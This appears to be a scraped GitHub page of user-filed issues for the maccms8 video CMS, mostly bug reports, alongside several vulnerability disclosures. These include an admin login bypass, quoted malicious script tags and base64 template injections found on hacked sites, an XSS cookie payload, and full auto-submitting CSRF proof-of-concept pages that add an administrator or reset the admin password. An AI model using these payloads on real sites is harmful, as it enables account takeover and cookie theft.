magicblack / maccms8 Goto Github PK
View Code? Open in Web Editor NEW苹果cms官方,苹果cmsv8,maccmsv8,麦克cms,开源cms,视频分享程序,文章程序,专题程序,免费程序
License: Other
maccms8's People
Contributors
Stargazers
Watchers
Forkers
uiue zyqgithub1 androidshadow sgseo larkdoc xgyuan dage66788 jinrishuofa ih0046654 634260840 rwm2000 sovoe 9miaopw looxxp jctml jiaosl kylesxk jsyzjhj inspireling qq83835332 jinhay feitianyiren zxc1122 ishaoguan mobistor aikandapian xielonghua asdlei99 changsongyang pr0f2n3 feilisp4 mfcer110 ycsit babyyvh 5536086 evecor yinyifeiniao deepwebhacker template-theme oldjth 6667316 gg1122 cardinalsystem256 adsryen mysaleslee zhongouba zhaoxiaqian itldg shaohuamiss qiuyue2379 lwsyes ailonei 2837linlinlin cnfug avooooomaccms8's Issues
苹果cmsV8使用火车头入库,苹果cmsV8程序内部采集参数配置无控制,
苹果cmsV8使用火车头入库,苹果cmsV8程序内部采集参数配置无控制,不管是火车头新采集的数据还是更新的数据,火车头都是返回发布成功状态,导致再次采集更新时火车头下载的图片会重复上传,是否是因为采集参数配置不受控制导致?
这次升级后出现性能问题,CPU100%满,【严重】
同样的流量访问,我回退上一次版本,cpu立刻下降,升级版本cpu撑不住,502,非常严重,请求修复
每次同步图片都是20个,在那个文件修改小
每次同步图片都是20个怎么改成一次10个或者5个,在那个文件里面修改
生成多个栏目列表的时候错误
第0页kongbupian/index-0.html
第1页kongbupian/index.html
从第0页开始,打开显示vod标签出错!
新版本视频介绍标签一片一片空白
老版本根目录被挂了马,数据库没有。新下载2019.1017程序安装,看了下视频内容页的介绍数据空白,后台文本有。一个个问题排除发现带有html标签的就这样,纯文本就会显示出来。怎么办?
还是我,刚刚不小心又发现了一处安全漏洞(重要)
感谢老大及时回复我上一条ISSUES!
刚刚发现一处安全漏洞。
后台根目录 index.php 第28行
if($method!='login' && $method!='check'){
chkLogin();
}
这个逻辑check就不会验证登录信息了。
那么后台所有文件应该避免method为这2个值。但是后台检测数据库木马得文件逻辑是?m=db-check
已经验证,只要知道后台路径,即可在无登录得情况下执行以下程序。
http://www.xxxx.com/admin/index.php?m=db-check
可见,这个文件无需登录就可以操作mysql。
所以,只要存在一个漏洞或者报错暴露了后台路径,黑客就有机会攻击数据库。
可以推断这次挂马有可能就是依靠这个漏洞注入得mysql,虽然暴露后台路径得漏洞还不得而知。
忘修复。
一直坚持用8X,简单易用,忘老大继续维护8X。
请问maccms8 支持 php7.4 么?
请问maccms8 支持 php7.4 么?
马克思cms转换苹果报错,31行,说没有变量
马克思cms转换苹果报错,31行,说没有变量,请用土豆详谈,加了有一段时间了。一直发不出去消息
最新版更新后,因疏忽产生了2个新问题
1:后台收索现在一个都搜不到了。
/admin/tpl/module/vod.php 第1123行
最后一个or 前面多了个 ')'
$where .= ' and ( instr(d_name,\''.$wd.'\')>0 or instr(d_starring,\''.$wd.'\')>0 ) or instr(d_subname,\''.$wd.'\')>0 ) ';
2:/admin/tpl/html/db_check.html 没修改为对应的 db_inspect.html
现在挂马检测用不了
V8还是有性能问题,以前后台重来不卡,最近几次升级后台偶尔会卡了
1016已经有很大改善了,但是依然偶尔会出现卡后台的问题
网站又被挂马了!!!!
不是数据库的问题,同数据库的其他站点没有问题!
也不是模板的问题,更换了其他模板还是存在问题!
之前出现了一次这种情况,清除缓存后好了!
现在后台无法清除缓存,一直失败,敢问大佬这是什么情况
刚刚升级到1015 似乎出问题了
影片标题被插入代码
影片标题在采集的时候被插入<script//src=https://ssaa.cc/uploads/ver.txt><script//src=https://ssaa.cc/uploads/ver.txt>
然后打开主页多次就显示
您的提交带有不合法参数,谢谢合作!
操作IP: 58.23.13.240
操作时间: 2019-12-18 09:45:24
操作页面:/index.php
提交方式: GET
导致主页一直打不开,麻烦大佬处理一下
数据库升级脚本好像无法升级
你好,程序我已经更新到1006,然后登录后台,发现有数据库更新提示
提示,发现本地有数据库升级脚本?是否执行升级操作!执行完毕后将自动删除脚本!
之后,我进行了升级操作,也提示
更新数据缓存文件……
升级完毕……
但是,系统还是提示
提示,发现本地有数据库升级脚本?是否执行升级操作!执行完毕后将自动删除脚本!
请问是不是因为我使用阿里rds的原因?
因为我本地搭建的测试环境应用和数据库在一个服务,升级数据库没有问题。
苹果8内容介绍那里插入图片前段不显示问题。
视频添加内容介绍编辑器里面插入了图片,文字可以显示,就是不显示插入的图片,重新安装也是只显示文字,插入的图片没有前段没有显示,请求修复(前段只能看到文字,后端显示是插入了图片但是前段就是不显示)调用绝对没有问题
首页报非法操作了
首页报非法操作了
搜索页建议
/index.php?m=vod-search
空内容搜索页可以F5无限刷新,后台设置的搜索间隔无效。
例如打开 www.xxxx.com/index.php?m=vod-search 然后F5无限刷新,因为是动态页,会占服务器资源,一直刷新就cc了
搜索页
大大,后台限制刷新时间没有用的,我都试过了,通过地址栏/index.php?m=vod-search进入搜索页后,没有任何时间限制,可以一直刷新= =
Memcached缓存能升级成Memcached插件吗,8X还是Memcache插件
Memcached缓存能升级成Memcached插件吗?
8X还在用很老的Memcache插件,10X已经支持多种缓存插件选择。而8X得Memcache插件已经非常落后了。希望能升级成Memcached插件续命。现在宝塔都是默认Memcached插件了
求老大为8X升级下吧,让用户也可以选择Memcache插件和Memcached插件吧,8X用户最后的倔强了。
v8 的定时任务生成bug
make-info-tab-vod-ac2-nomake
添加make 未生成后,宝塔设置定时访问该任务url,生成的html是按照vod_down.html模板生成的,不是vod_detail.html,貌似v8的定时生成,全是按down模板了。
最新版 v8采集报拼音错误
最新版 v8采集报拼音错误 修复了吗 老王
Memcached::setSaslAuthData(): SASL is only supported with binary protocol
想开启Memcached,验证报错这个。
搜索了一下,要开启二进制,实在找不到哪里开启这个二进制。
Memcached本身是不需要密码和帐号验证就可以读取和写缓存的,多了setSaslAuthData导致完全不知道怎么使用。
宝塔面板默认是不设置帐号和密码链接Memcached,我还算有基础的,通过配置文件找到了帐号密码,但是链接测试,依然报Memcached::setSaslAuthData(): SASL is only supported with binary protocol这个错误。而且不知道怎么处理。
感觉门槛太高了,setSaslAuthData这部验证是否可以取消?或者怎么才能顺利使用
v8拼音不识别数字和字母
v8拼音不识别数字和字母,url设置成拼音得时候,采集资源,只会自动生成汉字拼音,不会识别数字和字母,最早以前是可以的!v10测试可以正确识别!
比如:庆余年2019
生成qingyunian.html
希望能自动识别生成qingyuanian2019.html
你好,升级后,定时任务无法运行了
提示的内容是
您的提交带有不合法参数,谢谢合作!,操作IP: ,操作时间: 2020-01-01 20:50:26,操作页面:/inc/timming.php,提交方式: GET
升级到 1022C 出现了一个新问题。
文章,添加文章
选择分类,填写标题和内容之后,点保存按钮。
提示:
资源站mysqld占用高居不下
使用top查看为mysqld占用 数据库配置已优化过 应该怎么解决呢
苹果cms8有漏洞了
有人从搜索页面写入php木马,post进来的没有记录到日志
站群共用一个Memcached有问题
共用后数据出现错乱,如何像苹果10那样设置缓存标识
mac8 后台Memcache和Memcached 测试问题
升级到2020.1022最新版之后
1、后台选择Memcache,点测试,提示 “恭喜测试可用”
2、(php扩展 已经卸载了Memcache并安装了Memcached);后台选择Memcached,点测试,提示 “不可用请检查配置项”
测试php5.6和7.2都是上面的问题。
3、如果选择Memcache,并开启 “常用资源缓存”和“动态页面缓存” ;Memcached服务端确实会缓存,但是 get_hits 命中次数是0。
建议:关于8X二次开发的更多玩法,希望官方能改进一下这个地方
二开接口replaceTplCustom()位置能否前移至this->base()前,优先解析用户自定义标签和函数。昨天写了一大推理由,看老大一直没回复,后面找到了新方法就编辑掉了,虽然新方法可以绕开一些,但是更复杂了,所以还是希望老大能采纳迁移或者在base()前也加一个二开接口。昨天内容不知道老大看到没有,大致意思就是移至base()前,二次开发可以把用户标签和官方标签相结合,节省很大的开发量。可以实现类似{maccms:vod xxx={custom:diyxxx} by=time}xxxxx{/maccms:vod}等复杂的自定义功能。
相关问题可以在Issues菜单提问交流!相关文档教程在wiki菜单里
本程序免费开源,仅供内部交流学习使用,不提供不内置任何数据!!!
倡导富强、**、文明、和谐,倡导、平等、公正、法治,倡导爱、敬业、信、友善!
积极培育和践行社会主义核心价值观!
请在合法的前提下使用! 有问题可以在此提问交流!
老哥,请问会员登录之后显示的这个页面是哪个文件,我想修改下样式。
https://s2.ax1x.com/2020/02/12/1H2KuF.jpg
图片上传不上来,我就 外链截图了。
更新到最后,还是被挂马,d_name原名后面加了JS广告,
下午刚更新了20191008,晚上发现所有的 d_name原名后面加了JS广告
<script src=https://lefengtv.com/site.js></script><script src=https://lefengtv.com/site.js></script><scriptsrc=https://lefengtv.com/site.js></script><script src=https://lefengtv.com/site.js></script>
现在怎么处理
升级到1007后自定义采集参数有错误
升级到1007后自定义采集参数有错误。
酷云资源,?m=collect-list-xt-1-ct--group--flag-kuyunzy-apiurl-http://www.kuyun9.com/inc/ldg_kkm3u8.asp
添加上面的采集源无法显示。别的采集源正常就这个不正常感觉是这个位置的问题,/ldg_kkm3u8.asp
添加后quickmenu.txt文件里变成ldg_kkm3u8.asp这样,不知道现在好了没。
There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies
xss
XSS vulnerability exists in the background administrator article management office when adding and modifying
Where Chinese and English names are entered, enter
" onmousemove=alert(document.cookie) src=x,Following chart
Move the mouse over the label in the background article management area and the administrator cookie will pop up, as shown in the following figure
User cookies will also pop up when the front page mouse moves over the title
csrf
It is found that CSRF exists at the same time of adding and modifying
Before use
When the following page is constructed, the administrator can be induced to click
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
<input type="hidden" name="t_id" value="" />
<input type="hidden" name="flag" value="add" />
<input type="hidden" name="backurl" value="http://localhost/maccms8/safetest/index.php?m=art-type" />
<input type="hidden" name="t_pid" value="0" />
<input type="hidden" name="t_name" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_enname" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_tpl" value="art_type.html" />
<input type="hidden" name="t_tpl_list" value="art_list.html" />
<input type="hidden" name="t_tpl_art" value="art_detail.html" />
<input type="hidden" name="t_key" value="" />
<input type="hidden" name="t_des" value="" />
<input type="hidden" name="t_title" value="" />
<input type="hidden" name="t_sort" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>When the administrator visits the click Page
Category added successfully
csrf+xss
Here, CSRF and XSS can be used together, and attackers can use CSRF vulnerability to add or fix code brought in by articles,
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p>
<body>
<iframe hidden width=1000 heigth=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
<input type="hidden" name="t_id" value="" />
<input type="hidden" name="flag" value="add" />
<input type="hidden" name="backurl" value="http://localhost/maccms8/safetest/index.php?m=art-type" />
<input type="hidden" name="t_pid" value="0" />
<input type="hidden" name="t_name" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_enname" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_tpl" value="art_type.html" />
<input type="hidden" name="t_tpl_list" value="art_list.html" />
<input type="hidden" name="t_tpl_art" value="art_detail.html" />
<input type="hidden" name="t_key" value="" />
<input type="hidden" name="t_des" value="" />
<input type="hidden" name="t_title" value="" />
<input type="hidden" name="t_sort" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
//Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie.
分类被挂马
1、电影{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44bj ok
2、连续剧{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
3、综艺{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44bj ok
4、动漫{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44bj ok
5、动作片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
6、喜剧片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
7、爱情片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
8、科幻片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
9、恐怖片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
老大,麻烦你看看,我昨天编辑掉了,我觉得还是应该给你说下这个优化的地方
二开接口replaceTplCustom()位置能否前移至this->base()前,优先解析用户自定义标签和函数。昨天写了一大推理由,看老大一直没回复,后面找到了新方法就编辑掉了,虽然新方法可以绕开一些,但是更复杂了,所以还是希望老大能采纳迁移或者在base()前也加一个二开接口。昨天内容不知道老大看到没有,大致意思就是移至base()前,二次开发可以把用户标签和官方标签相结合,节省很大的开发量。可以实现类似{maccms:vod xxx={custom:diyxxx} by=time}xxxxx{/maccms:vod}等复杂的自定义功能。
你好,我想寻找一款V8插件
您好,我是用的是马克思sql server 版,想转换成苹果V8程序。我记得在论坛有一款插件。现在不见了,有劳仁兄在蓝奏发布一下马克思转换V8的插件好吗?
mysql 200%一整天了
mysql 200%一整天了
老哥,后台 缓存 设置 好像出问题了。
There are two CSRF vulnerabilities for adding administrator accounts and changing administrator passwords
Once opened by the administrator, the following two web pages are opened
one.html--add administrator
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/admin/admin_data.php?ac=save&tab=manager" method="POST">
<input type="hidden" name="m_id" value="" />
<input type="hidden" name="flag" value="add" />
<input type="hidden" name="backurl" value="http://localhost/admin/index.php?m=user-manager" />
<input type="hidden" name="m_name" value="test2" />
<input type="hidden" name="m_password" value="123456" />
<input type="hidden" name="m_status" value="1" />
<input type="hidden" name="m_levels[]" value="b" />
<input type="hidden" name="m_levels[]" value="c" />
<input type="hidden" name="m_levels[]" value="d" />
<input type="hidden" name="m_levels[]" value="e" />
<input type="hidden" name="m_levels[]" value="f" />
<input type="hidden" name="m_levels[]" value="g" />
<input type="hidden" name="m_levels[]" value="h" />
<input type="hidden" name="m_levels[]" value="i" />
<input type="hidden" name="m_levels[]" value="j" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
two.html--change administrator password
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/admin/admin_data.php?ac=save&tab=manager" method="POST">
<input type="hidden" name="m_id" value="1" />
<input type="hidden" name="flag" value="edit" />
<input type="hidden" name="backurl" value="http://localhost/admin/index.php?m=user-manager" />
<input type="hidden" name="m_name" value="admin" />
<input type="hidden" name="m_password" value="php233" />
<input type="hidden" name="m_status" value="1" />
<input type="hidden" name="m_levels[]" value="b" />
<input type="hidden" name="m_levels[]" value="c" />
<input type="hidden" name="m_levels[]" value="d" />
<input type="hidden" name="m_levels[]" value="e" />
<input type="hidden" name="m_levels[]" value="f" />
<input type="hidden" name="m_levels[]" value="g" />
<input type="hidden" name="m_levels[]" value="h" />
<input type="hidden" name="m_levels[]" value="i" />
<input type="hidden" name="m_levels[]" value="j" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
tag查询,cpu100%居高不下
把tag关掉就好了,是不是数据库的tag少了什么定义了呢?
最新升级包升级上去后搜索和缓存器无法使用
最新升级包升级上去后搜索和缓存器无法使用
有一个问题我把自动生成tag关闭了,为什么视频哪里tag还是勾选的自动生成,也没有生成tag
还有一个问题我把自动生成tag关闭了,为什么视频哪里tag还是勾选的自动生成,也没有生成tag,我也采集不到资源站里面的tag
升级后无法添加自定义资源解决办法
应该是表结构没有创建,请复制以下内容,在系统后台执行sql语句中执行一次啊
CREATE TABLE {pre}collect (
c_id int(10) unsigned NOT NULL AUTO_INCREMENT,
c_name varchar(30) NOT NULL DEFAULT '',
c_url varchar(255) NOT NULL DEFAULT '',
c_type tinyint(1) unsigned NOT NULL DEFAULT '1',
c_mid tinyint(1) unsigned NOT NULL DEFAULT '1',
c_appid varchar(30) NOT NULL DEFAULT '',
c_appkey varchar(30) NOT NULL DEFAULT '',
c_param varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (c_id)
)
ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
================================
如果在其他数据库管理软件中执行比如phpmyadmin,请自行把{pre}改为你得表前缀即可
为什么苹果8在视频里面修改图片地址或者视频地址都没反应
为什么苹果8在视频里面修改图片地址或者视频地址都没反应,点击保存再打开看视频地址或者图片地址没变
搜索页
找个v8的站:
访问 www.例子.com/index.php?m=vod-search
会显示该站所有视频的搜索数量和结果页数
然后f5可以无限刷新,没有任何提示拦截。
如果是从网页点搜索框进入,再f5刷新是会弹提示框的,
希望大大修复!
v10没有发现该问题!
搜索字符长度限制:{app_searchlen}
老王,更新最新版后,后台新增的搜索字符长度限制里边显示{app_searchlen}是什么意思,需要手动更改吗
8X有个地方希望老大改进下,不是BUG,但是改进了8X会更好
1.此处非BUG,改进会好很多
/admin/tpl/module/vod.php 第1123行 希望加上d_subname字段得模糊查找
加上d_subname,可以模糊查找副标,这样能避免重复发布同一个视频,因为采集多个资源站,很多资源站同一个视频名字不一样,导致最终发布视频重复。有这个字段,手动党发布的时候可以手动过滤掉。不太好描述,希望说清楚了。
现在每次更新都要再手动更改一次。
2.bug
/inc/common/function.php 第0174行 $error[line] ->$error['line']
[Type] Warning
[Msg]: Use of undefined constant line - assumed 'line' (this will throw an Error in a future version of PHP)
报错的时候会优先报这个错,这行line少了2个单引号,高版本php会报错,导致正常的报错无法显示。
这个地方也是每次更新都要手动更改,很头痛
8无法同步jpeg后缀格式的图片,请告诉下如何同步改格式到本地服务器
苹果cms8无法同步jpeg后缀格式的图片,苹果cms10且可以同步改格式到本地服务器,请告诉下如何同步改格式到本地服务器
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.